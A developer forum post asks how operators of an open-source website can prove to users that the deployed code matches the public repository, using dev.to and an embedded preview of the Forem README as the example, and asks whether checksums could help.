When developing open source software how could someone prove to the user that the code running is actually the same as the code in the repository?
What if I were to develop an open source website that handles sensitive data, in theory a user could check the source code to see if nothing weird happens with their data, like sending user info to a third party service. But how can you prove that the code in the repository isn't being edited somewhere else before deployed to the server?
Or maybe a more immediate example; how can Ben prove that this website is actually using the code in
For Empowering Community
Welcome to the Forem codebase, the platform that powers dev.to. We are so excited to have you. With your help, we can build out Forem’s usability, scalability, and stability to better serve our communities.
What is Forem?
Forem is open source software for building communities. Communities for your peers, customers, fanbases, families, friends, and any other time and space where people need to come together to be part of a collective See our announcement post for a high-level overview of what Forem is.
dev.to (or just DEV) is hosted by Forem. It is a community of software developers who write articles, take part in discussions, and build their professional profiles. We value supportive and constructive dialogue in the pursuit of great code and career growth for all members. The ecosystem spans from beginner to advanced developers, and all are welcome to find their place…
Maybe I am looking over something really obvious. I am aware that when it comes to downloading files you can use checksums to confirm it's the same, but can you apply the same technique to a website? You could put the checksum generated from the repository at the bottom of the website. But that doesn't really prove anything.
Have you ever thought about this? Got experience with this? Let's hear it.